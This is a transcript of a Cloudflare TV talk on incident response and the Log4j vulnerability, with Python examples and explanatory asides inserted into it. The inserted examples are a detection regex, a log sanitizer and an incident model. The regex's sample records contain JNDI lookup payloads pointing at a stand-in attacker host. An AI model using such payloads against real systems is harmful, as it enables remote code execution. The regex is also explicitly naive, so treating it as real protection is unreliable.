Behind the Scenes: Incident Response at Cloudflare

Name: Behind the Scenes: Incident Response at Cloudflare
Uploaded: 2022-05-06T15:00:00.000Z
Duration: 30 min
Description: We’ll discuss how Cloudflare responds to security incidents and vulnerabilities and go behind the scenes to examine the activities surrounding the Log4j vulnerability in December 2021.

Presented by: John Engates, John Graham-Cumming

Originally aired on May 12, 2023 @ 6:00 AM - 6:30 AM EDT

English

Security

Transcript (Beta)

Hello. Welcome to Cloudflare TV. My name is John Engates. I'll be your host for the next 30 minutes. Our program today is called Behind the Scenes. And in this episode, we're going to talk about incident response at Cloudflare. How does Cloudflare respond when a new vulnerability is discovered? What happens when we see a significant BGP or DNS outage on the Internet? And why do we write a blog post about a fiber cut on the other side of the world? We'll dig into these topics and more right now on Behind the Scenes.
My guest today on Behind the Scenes is John Graham-Cumming, who is CTO at Cloudflare. Welcome, John.
It's nice to see you, John.
Yeah, it's good to see you. So, John, I know you're a bit of a regular on Cloudflare TV. This is actually one of my first episodes. But would you give our viewers just a brief sort of background on yourself and your role at Cloudflare, what you've been doing over these years, and just give them a little background.
Well, I'm currently CTO of Cloudflare and have been for a number of years. I actually joined Cloudflare as a programmer. I wrote quite a lot of code that goes into our system, particularly stuff around compression, DNS, the WAF, and other bits of it. And over time, I managed different parts of the organization, everything that was technical. Eventually, as we grew, those things got their own leaders. Right now, I have a small group of people, it includes you, John, in case you forgot, the field CTO organization, which goes out and works with our largest customers on the kind of technical problems they have. I also have the research team under Nick Sullivan that works with universities on long-term research projects. And then I have a team of engineers working on data, who are looking at data so that we can improve our products and also expose as much of that data as we can to the world so people can understand how the Internet works.
Well, I think it's important for folks to hear about your background, because I think it likely shapes how you're inclined to respond to incidents and things that are going on. But before we get ahead of ourselves, can you help me explain to the viewers what an incident is? When I say that word, maybe give them an idea of what you think of and the broad categories that those things fall into.
Yeah, I mean, we actually have internally a process around incidents where there is an on-call incident commander, and that person can declare an incident through our chat ops system. And that could be anything from a major outage of Cloudflare systems, right, if Cloudflare were to go down, to a smaller component of Cloudflare that is failing and needs all hands on deck. It could be a security vulnerability that someone's found that is serious and needs addressing quickly. Or it could be something that's happening on the Internet that is having a knock-on effect on Cloudflare. So that could be a BGP leak, for example, which might be happening somewhere else on the Internet. Or even actually, funnily enough, when Facebook went down last year, so many people were trying to get to Facebook. Facebook's not a customer. But actually, it caused load on our DNS systems because people were going Facebook, Facebook, Facebook, Facebook. And so all these things could be incidents. And we have a pretty broad definition of that. And in fact, anyone in the company, a bit like the old "anyone can stop the Toyota production line", can say, hey, this should be an incident and call it. And if it doesn't actually reach the level of needing an immediate response, then we'll close the incident. In fact, there was one of those that happened yesterday. I got paged for something which looked like it might be bad. And in fact, we said, oh, actually, no, this was a false alarm. So we have a broad range of all hands on deck, get people in the right room, get them all discussing the problem very quickly.
And we've now automated all of that process.
Yeah. Well, I imagine you've seen your fair share of those kinds of incidents in 10-plus years at Cloudflare. I, too, have seen those in my career. Actually, this is one of the reasons why I wanted to interview you today: it's something that I've experienced over and over again. My best story of an incident from one of my previous lives is of an individual who ran their truck into the transformers of a major data center, and it created all kinds of problems. They passed out, their vehicle launched over a parking lot and other cars, and they hit the building. And the fire department basically had to de-energize the entire facility to save the life of this individual. So incidents can be small, they can be minor, or they can be major. When I think about incidents, these are things that happen every day. Things around the world happen. But when you're running services like we are that are critical to operating other people's businesses, their livelihood is in your hands. It's a huge responsibility. Do you think about that when we're managing incidents? Is that something that comes into your mind, or is it just always in the background? How do you think about the importance?
I think if we have a major incident, then clearly that's in the back of our minds. We have to get this back online as quickly as possible, just because of the scale at which Cloudflare operates. Remember, we're in more than 250 cities worldwide where we have hardware, and we have millions of customers. You, dear viewer, have probably gone to something that Cloudflare protects today without realizing it: used an app that we protect or something like that, or gone to a website. And maybe your business uses Cloudflare. So us being up is very, very important. So obviously, we want things to be back online. Obviously, there are metrics around how many nines of reliability we have, so that's very, very important.
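As a rough illustration of the "nines of reliability" arithmetic mentioned here, the sketch below converts a number of nines into the downtime it would allow per year. The conversation does not state any actual availability target, so the function name and the range of values are assumptions chosen only for illustration.

```python
# Illustrative arithmetic only: no real availability target is implied.
MINUTES_PER_YEAR = 365 * 24 * 60  # 525,600 minutes, ignoring leap years


def allowed_downtime_minutes(nines: int) -> float:
    """Minutes of downtime per year permitted by an availability of N nines."""
    unavailability = 10 ** (-nines)  # e.g. 3 nines -> 0.001 (99.9% available)
    return MINUTES_PER_YEAR * unavailability


for n in range(2, 6):
    availability_pct = 100 * (1 - 10 ** (-n))
    minutes = allowed_downtime_minutes(n)
    print(f"{n} nines ({availability_pct:.3f}%): about {minutes:.1f} minutes per year")
```

Each additional nine cuts the permitted downtime by a factor of ten, which is why the speed of recovery during an incident matters so much at this scale.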
And so I think that's in the back of our minds. The scale of what we're doing is certainly there, although I have to say that during an incident, I'm not thinking about that at all. We're thinking about what we need to do to get it back online. What do we understand about what the problem is?
Yeah, it's sort of executing the plan, so to speak, in terms of incident response. And I honestly think that the true test of a company, and the organization that you put around it, is the people and how they respond during a crisis. Being under pressure is the true test of an individual and a company, and so is how it communicates with its customers during those stressful times. So let me zoom out a little bit. For the viewers, John mentioned this. I work on his team. He hired me into Cloudflare in October of last year. I've worked for many years in a lot of service providers. I've seen good and bad and ugly responses to incidents. I know from the outside looking in at Cloudflare how I perceived the response. I mean, I usually saw it in the form of a blog post or a post-mortem write-up that Cloudflare put out after an incident. Whether something went right or wrong, it gets sort of a detailed blog post. And sometimes, like John mentioned, it's not even an incident that happened at Cloudflare or inside Cloudflare, just something that happened elsewhere on the Internet. Right after I joined, the Log4j vulnerability was one of the first major incidents that I got to observe sort of after onboarding at Cloudflare. And I want to use that as an example today. This vulnerability was discovered back in December 2021. I was in the internal chat rooms. I was watching behind the scenes. And it was interesting for me to watch this sort of unfold, as John mentioned, the urgency, the level of attention from senior leaders. It was very impressive to me. I guess I would say it's somewhat unique.
I mean, I've seen good teams, great teams, but this was a pretty unique sort of example of this. So, John, before I jump into that any more, is there anything on that particular incident that stands out for you that made it unique or that made it something different or out of the ordinary?
Well, actually, it's interesting you asked that question about that one because what happened was when Log4j came out, I think our immediate thought was we have to protect our customers because many of our customers will be using Java and they will have this. And we know from experience that once a vulnerability comes out, attackers start using it immediately. Even if it's just scanning, they'll start doing this stuff within hours. So, initially, we were going down the route of we need to roll out protection in the WAF and put it out for all customers. And actually, quite quickly, we thought, wow, this is really bad. We should roll out protection for all of our customers, even those who don't pay for the WAF. And actually, we eventually ended up formalizing that process where we have a free tier in our WAF for sort of the worst of the worst vulnerabilities. Shellshock is one of them. And then Log4j, where we'll say, look, we'll just protect you even if you don't pay us because that's going to make the Internet safer. And so, initially, we were doing that. In the middle of it, I was on the phone with Dane Knecht, who is the SVP of emerging technology, who has worked at Cloudflare pretty much as long as me. And we were discussing, and we were working with the WAF team, making sure stuff was getting out. And suddenly, we were like, wait a minute, we use Java. Maybe, you know, we're vulnerable. Maybe we're under attack as well. And so, obviously, we were doing the WAF and then we were looking at our own system. So, that was actually slightly unusual because usually, it's like either we've got a problem or it's outside and we're protecting customers.
But in this case, it was that we could be vulnerable and our customers are. And at that point, we declared an incident. I believe Dane actually hit the big red button on chat ops, declared an incident, and woke people up around the world, literally. So, it was early morning for me in the UK, in Europe, and for Dane it was late at night. And then we woke up the security team. We had people in Australia and we had everybody jump on it very quickly. So, that was unusual because we were working two different angles at the same time. And also, you know, Cloudflare communicates a lot through the blog. And we always have a process whereby we start keeping a record of what is happening so that we can write the blog post. And so, part of that happens in chat because lots of things happen in chat. Part of that will happen in Google Docs where we'll just start keeping records of like, oh, we did this, this happened, we saw this piece of information, so that later on, we can write stuff up. So, it's almost as if we're writing the incident report simultaneously with the actual incident happening. And I think that's become a powerful part of the process.
Let me see if I can share a couple of slides that I've compiled. Can you see that, John?
Yeah. Yeah, I do.
Okay. So, this is a few slides that I pulled together. Just, you know, over the last few months, I've had to explain our response to customers and partners and folks that we've worked with. But I took some of these just sort of out of a presentation that I did. So, as John mentioned, this vulnerability, Log4j, was sort of released or announced December 9th. I don't want to spend too much time dissecting Log4j. That's been done. Again, I'm just sort of setting the stage for what was going on behind the scenes, as John was talking about. So, it was a very high-risk vulnerability. They rated it as a 10 out of 10. It was something that could be exploited externally.
So, that made it a potential vector for attack that was really, really critical. So, this was what John was mentioning, Dane Knecht. He was on Twitter early in the morning, 2 a.m. his time, I imagine, talking about what was going on, what we were seeing, basically warning the world to patch their Internet-facing Java servers, making sure they get them behind a WAF, sort of telling the world that this was a really critical vulnerability that was on par with some of the worst that we'd seen in the past, and also telling customers that we were getting ready to implement WAF rules. This was another snippet that I took between you and Dane and Matthew, our CEO. This was just one little snippet that I took, and I'll zoom in on it because I think it's really interesting to see how we communicate behind the scenes. This is the worst vulnerability the Internet has seen in, I can't quite see the top there, but in five-plus years. Nothing else you're working on is more important than this. It trumps our CIO Week, which was going on at the time, and everything else, literally a drop-everything moment. And then he went on to say he wanted to publish the definitive post on what this vulnerability is, how long it's been out, how it got introduced, how it's being exploited, and he wanted to get it written up ASAP, and we'll get more information as we learn more. So, you kind of get a little flavor of how we're communicating behind the scenes, and that led to what John was mentioning, the blog post. This was, I think, the very first one that was published the day after the announcement, probably not even 12 hours later. It just happened to fall across a time boundary between days. Then we also had sort of the mitigation that we were putting in place, the rules, the three new WAF rules that we had deployed.
Matthew made the determination that this was so bad, as John mentioned, that we were going to roll this out to all of our customers, not just paying customers, but people that were on free plans. This was the write-up that you mentioned that was the internal response, our own IT organization, our own teams behind the scenes in engineering, and how we took it on from sort of the internal perspective and tried to understand what implications it had. And then even going further and talking through how we prevent the spread of Log4j in terms of log updates and sanitizing logs, making sure that we weren't the source of more sort of contamination of other people's systems. So, all of that, and then finally sort of looking backwards into our log files. John mentioned that we have visibility into what's going on in a vast array of servers around the world. So, we have visibility into where this is being exploited potentially and when it began. And so, it was another interesting blog post that talked about that. So, I'll stop sharing for a minute. We can discuss a little bit of that, but that to me is pretty telling in terms of the priority that Cloudflare puts on communication and understanding what's going on.
Actually, there was a thing you sort of skipped over in those slides, which is where you were looking at the chat where Matthew was saying, you know, I want this to be a definitive blog post. I think I pasted into the chat, here's the Google Doc with the blog post already written, because we had already started as part of our process, knowing, yeah, we're going to have to communicate about this. So, we'd already started writing it. And I think one of the things, yeah, you see it right there. He's, you know, he's saying at 10:37 a.m., I want us to post a definitive blog post. Three minutes later, I paste, by the way, you know, here's the text of that blog post. And I didn't write it in three minutes. What happened was we had already started working on it.
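The three technical strands mentioned above (blocking rules, sanitizing logs, and looking back through logs for the first exploitation attempt) can be sketched in a few lines. This is a deliberately naive illustration, not the rules or tooling that were actually deployed: the pattern, the function names, the `x{` replacement string, and the sample records are all assumptions. Real exploit strings used nested lookups and other evasions that a literal match like this one would miss.

```python
import re
from datetime import datetime
from typing import Iterable, Optional, Tuple

# Naive pattern: the literal "${jndi:" lookup prefix, case-insensitive.
# Obfuscated variants (nested lookups, for example) are NOT covered.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def looks_like_log4j_probe(value: str) -> bool:
    """True if a request field contains an un-obfuscated JNDI lookup."""
    return JNDI_LOOKUP.search(value) is not None


def sanitize_for_logging(value: str) -> str:
    """Break up "${" so a Log4j-based log consumer will not expand a lookup."""
    return value.replace("${", "x{")  # replacement string is an assumption


def first_seen(records: Iterable[Tuple[datetime, str]]) -> Optional[datetime]:
    """Earliest timestamp among records whose value looks like a probe."""
    hits = [ts for ts, value in records if looks_like_log4j_probe(value)]
    return min(hits) if hits else None


# Invented sample data, for illustration only.
sample = [
    (datetime(2000, 1, 3, 12, 0), "${jndi:ldap://attacker.example/a}"),
    (datetime(2000, 1, 2, 9, 30), "Mozilla/5.0 ${JNDI:dns://attacker.example}"),
    (datetime(2000, 1, 1, 8, 0), "Mozilla/5.0 (ordinary user agent)"),
]
print(first_seen(sample))
print(sanitize_for_logging(sample[0][1]))
```

The same predicate serves all three purposes here: rejecting a request, deciding what to rewrite before it reaches a log pipeline, and querying historical records.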
And I think one of the things that's interesting about our process is, if you declare an incident in Cloudflare, and this clearly was an incident, it creates a chat room specifically for that incident, which has many things associated with it. It has a commander, but it also creates a set of threads, which have different purposes. So, instantaneously, you've got a thread that's on debugging, like, how do we debug this thing? You've got a thread that's on impact. So, who's affected? And so, what you'll see is, if this was an outage at Cloudflare, the debug thread would have people debugging the problem. The impact thread would have the support team in there, making sure they understand what they're going to say to customers. And then there's a comms thread, which talks about how we're going to communicate outside. So, like, instantaneously, we're off working on all of those things simultaneously. And people will be taking on different roles as part of it. Because we truly, truly, truly value getting the information out as quickly as we can about these things, whether it's an external thing, like Log4j, or whether it's an internal problem.
Yeah. Again, I was fascinated, personally, to watch the stream of communication back and forth between individuals. Sometimes, there are people that land in a chat room, and everybody's trying to help make sure that the communication gets sorted appropriately. And sometimes, I imagine there can be too many people in a room as well, people trying to get information too early. I have noticed that sometimes we will make certain chat rooms designed for certain organizations, or parts of the organization, so that we don't step on each other's toes, or we don't accidentally slow things down in terms of response. Tell me about that process.
So, a little bit. Although, to be honest with you, I mean, you mentioned that you were in the chat rooms for Log4j, and seeing what was going on. And you weren't a special privileged invitee, right?
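The incident-room structure described above (one room per incident, a commander, and separate debug, impact, and comms threads) can be modelled with a small data structure. This is a hypothetical sketch: the three thread names come from the conversation, but the class, function, and field names are invented for illustration and do not describe the real chat ops tooling.

```python
from dataclasses import dataclass, field
from typing import Dict, List

# Thread names are taken from the conversation; everything else is hypothetical.
DEFAULT_THREADS = ("debug", "impact", "comms")


@dataclass
class Incident:
    title: str
    declared_by: str
    commander: str
    is_open: bool = True
    threads: Dict[str, List[str]] = field(
        default_factory=lambda: {name: [] for name in DEFAULT_THREADS}
    )

    def post(self, thread: str, author: str, message: str) -> None:
        """Append a note to one thread; the notes double as the written record."""
        if thread not in self.threads:
            raise KeyError(f"unknown thread: {thread}")
        self.threads[thread].append(f"{author}: {message}")

    def close(self, author: str, reason: str) -> None:
        """Close the incident, for example when it turns out to be a false alarm."""
        self.post("comms", author, f"closed: {reason}")
        self.is_open = False


def declare_incident(title: str, declared_by: str, on_call_commander: str) -> Incident:
    """Anyone may declare; the on-call commander is attached automatically."""
    return Incident(title=title, declared_by=declared_by, commander=on_call_commander)


incident = declare_incident("Log4j exposure", "engineer-a", "commander-on-call")
incident.post("debug", "engineer-a", "checking which internal services run Java")
incident.post("impact", "support-b", "drafting customer guidance")
incident.post("comms", "writer-c", "started the public write-up")
print(sorted(incident.threads))
```

Creating all three threads at declaration time is what lets debugging, customer impact, and external communication proceed in parallel from the first minute, with the posted notes forming the record used for the later write-up.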
You're just like, well, yeah, there's something going on. I want to see what's going on. So, we generally don't close off these things. People can join in. There's usually, when the chat ops thing runs, there's also a video call that is created as well. So, usually, the core debugging stuff is going on in the video call, with information being pasted into the chat for recordkeeping, and also just to share with people. So, usually, that's actually not a very big deal. Sometimes, you'll have people, you know, wander in half an hour late and say, by the way, it looks like the Internet doesn't work, or something. We're like, yeah, we know. We're working on it. But mostly, it will allow people to participate from wherever they are, and people can jump in with information. So, I think we try to be very open about that. I don't think we would lock it down. Occasionally, we'll take something off on the side. I think the interesting thing with the Log4j one was that, obviously, there were these two things going on, which is like, how do we protect our customers as fast as we can, right? And how do we protect Cloudflare? Like, are we being exploited? Because we were worried that, you know, someone had got into Cloudflare, into critical infrastructure. So, yeah, the security team under Joe Sullivan was really working on that side of it, right, with IT. They were thinking about that side of it. The WAF team was rolling out rules, looking at evasion, updating things. And then the data team here in Lisbon was digging into the data, trying to figure out when was the first exploitation, what have we seen, where is it happening? So, you had a lot of things happening simultaneously. I think one thing that's really, really important is, we developed an organization with this very high degree of trust that people are going to do stuff, right? So, it's just like, you know, Dane and I were talking. We paged Joe Sullivan. He's like, yeah, I'll get the team on it.
They're on it. And, you know, we would check in with them from time to time, or they'd ask us for a piece of information. But it's just a lot of autonomy that enables us to do these things very, very rapidly. And then usually, especially if it's something major and it's something public, someone who's good at writing fast, it can be me quite often, but others too, will get working on the public disclosure. So, we're all ready to go. And an amusing one, in some ways, was when Facebook had a massive outage last year. And obviously, we saw it from our perspective because we saw traffic change in terms of DNS, because people kept going to Facebook and we run a big DNS service. So, it actually doubled the load on our DNS service, just because people were retrying Facebook and the apps were retrying. And so, we had an incident around that. And we actually managed to put out a blog post explaining what had happened to Facebook. They're not a customer and we didn't have inside information, but we did it from the external view, before the incident was over, before Facebook came back online. We were basically explaining that it was a DNS issue. Based on what we were seeing, we knew what it was: initially, it looked like DNS, then it was really BGP. And in fact, we saw they'd withdrawn themselves from the Internet. And amusingly, some actual engineers from Facebook contacted us and said, you've got that almost 100% right. Could you just make this modification to your blog post? This is actually what's going on internally. And by the way, why do we do this? Especially right at the beginning of Cloudflare's history, we were a small company. And if you think about what Cloudflare does, if you use our service, your network traffic is passing through us. And if you think about it, if we go down, you go down. And so, we had to build trust with our customers. And one way was just to be very transparent about things.
If things go wrong, if things go well, how we build things, what technologies we use. And so, we built this culture of just like, look, if something goes wrong, we'll just talk about it. And we'll just be completely open about it. And there are a couple of things that are important about that. One is, if you're going to be completely open, then you're probably going to say things that you have to take back because you didn't fully understand the situation. And it's going to be hard because you're going to show that you made mistakes. And the second thing is you have to do it fast. And so, one of the things I see happen in companies that don't do this is they take a long time to give you partial information about what happened. And one of the things that I think is incredible about Cloudflare, and especially after we went public, but even before, is how quickly Cloudflare's legal department can get involved in signing off on a public disclosure of a major outage that Cloudflare has. And I have seen it happen in minutes, multiple times, where I can go to the legal team and say, here's the outage, here's what's happened. Here's the public disclosure. I need you to read it and tell me if there are any legal issues here. And that, I think, gets stuck in other companies. I think it's like, no, legal is going to sign off on this. And then, comms is going to sign off on this. And before you know it, days have gone by. Your customers don't know what's happened to your service. It just generates a situation where people don't trust you. And by the way, in terms of the comms team and the way comms works at Cloudflare, obviously, comms is involved in incidents. They're invited into the incident room. Again, we have an extremely good relationship with Daniela's group in comms. And so, she will typically, especially if there's a major outage, talk directly to me. I usually am the interface with her.
And we'll keep them updated on what's happening, where we think it's going, because the press will start to ask, right, what's happening? And then, we communicate that. And then, we'll put out the definitive description of what happened and where we are, whatever. There's no sign-off from the comms team. It's like, here's the deal. This is what's happening. It's very much an engineering culture in Cloudflare. That's what runs things. And the other groups are incredibly supportive of that mission. And I think the reason they're incredibly supportive is because we've proved that it works to do that.
And I think having the support from the senior leadership in a situation like that matters. You've got Matthew, you've got yourself, you've got really the whole senior team involved. And that permeates the culture. They see that people are rolling up their sleeves and doing behind-the-scenes activities in this sort of situation. I mean, people like to follow leaders that are in the trenches with them. And we know that sort of approach works. And I think it's just fascinating to see it, again, behind the scenes where all of the folks are communicating in real time and getting the information to people like comms. Comms is the interface to the outside world from a press perspective, for people that might send inbound requests. The blog is another great way to get that information out. And to me, that's been one of the other not-so-secret weapons of Cloudflare, the ability to get information out on our blog and share as much detail as we do, because that's not done in a lot of organizations. I mean, from technical details of a product launch to analysis of an incident or a vulnerability or something, it's just very rare to see that level of transparency and regular cadence. I mean, you're the person behind the blog in many ways. You're the person I see most active on the blog. That cadence must be hard to keep up.
Just sort of tell me in two minutes, how does that work behind the scenes at Cloudflare?
Well, I mean, we track blog posts in Jira, right? So there's a process for that. And I make the final call on what gets published and I edit every blog post. So anything that gets published on Cloudflare, I go through and I will give feedback on it. We also have our product content experience team who will make sure that the language is good and all that kind of stuff. But it's a fairly agile process, realistically, using Jira, where we can just push things through. And of course, because I'm the final sign-off, if we need to push something out right now, I can just jump all the steps and go, this is what we're doing. Again, a high-trust environment, right? I mean, there's nothing stopping me from publishing something immediately without other people signing off. I probably wouldn't do that because I might want legal advice on something, but we have a very good environment in which people trust each other. I'll give you an interesting example. Three years ago, before we went public, while we were working on going public, we had a massive outage. It was the middle of the afternoon in London, and Matthew called me on my phone. It's the shortest phone call I've ever had with him. He said to me, what's going on? And I said, I don't know. And hung up. I've never hung up on him before, but I was like, I'm too busy to talk to the CEO. We're figuring this thing out. And we got it back online very, very quickly. And I think that, you know, we work like that. And I was able to then call him back and say, okay, here we are. This is what the situation is. And obviously, you know, he himself was very worried about the situation, but I think that we have built a team that is able to make very rapid decisions.
In the last few minutes, I wanted to talk about one category of outage or incident that we see sometimes on the blog.
This is a great segue into this, but every once in a while, I see a post about some sort of a fiber cut or an Internet outage or some sort of disruption in Internet connectivity on the other side of the world, unrelated to Cloudflare. Why do we pay attention to those kinds of incidents?
Well, I think you're wrong that it's unrelated to Cloudflare, basically. I mean, Cloudflare, remember...
Seemingly unrelated. Okay.
So, global company. Our customers are in more than a hundred countries worldwide. We're not, you know, U.S.-focused; most of our revenue is from outside of the U.S. Our customers' customers are everybody who uses the Internet. And so, you know, a fiber cut in Fiji is going to affect, you know, a group of people there who've lost access to the Internet. And oftentimes it's hard to know what's really going on when these problems happen. And we, because of our 250 cities worldwide, the scale of our network, have a really good view of what's happening on the Internet everywhere. You know, if I want to go in and say, hey, how's the performance of this mobile network in Indonesia today? I can get that information because of the scale of what we're doing. Just today, for example, Google Cloud had an outage, which affected some services, and we could see it in our data. And we tweeted about it a few hours ago. It was like, you can see what's happening. And so what we do is we try and create a situation where people can trust the Internet, can understand what's happening on the Internet. You can actually look on Cloudflare Radar and see some of our insights. And I think it's important for people to know how the Internet works, to see and get definitive information. And we have that view of the, you know, the Internet weather, if you like. And so we will push out information about that, about outages. You know, you see outages in places all over the place. And I think it's just part of what we do.
And remember our mission: help build a better Internet. And I think visibility is part of helping.
Absolutely. And I imagine that informs the decisions around how we need to shape and adapt our network over time, as well as our future direction. Like if we're seeing patterns of disruption in certain parts of the world, or connectivity issues, you know, between an ISP and a particular customer of ours, that helps us shape our products as well.
Absolutely. We can shape, you know, where we want to have better connectivity, where we should site servers, you know, where the users are, what the performance looks like on those networks. It really does that. That data gives us a view that enables us to do two things, a higher-performance network and better security, because we have visibility into what's happening pretty much anywhere in the world.
Well, I think with that, John, I wanted to say thank you for joining me today on Cloudflare TV and talking about incidents. I think it's been eye-opening for me to understand sort of the behind-the-scenes activities. And I hope the viewers also understand that it's really important to us and we're going to keep doing it. And hopefully we'll share more detail with you as we learn new techniques and new ideas for how to communicate. Thank you again, John.
Thanks very much for having me. It's great to be back on Cloudflare TV. It's been a while.
It's great. Thanks.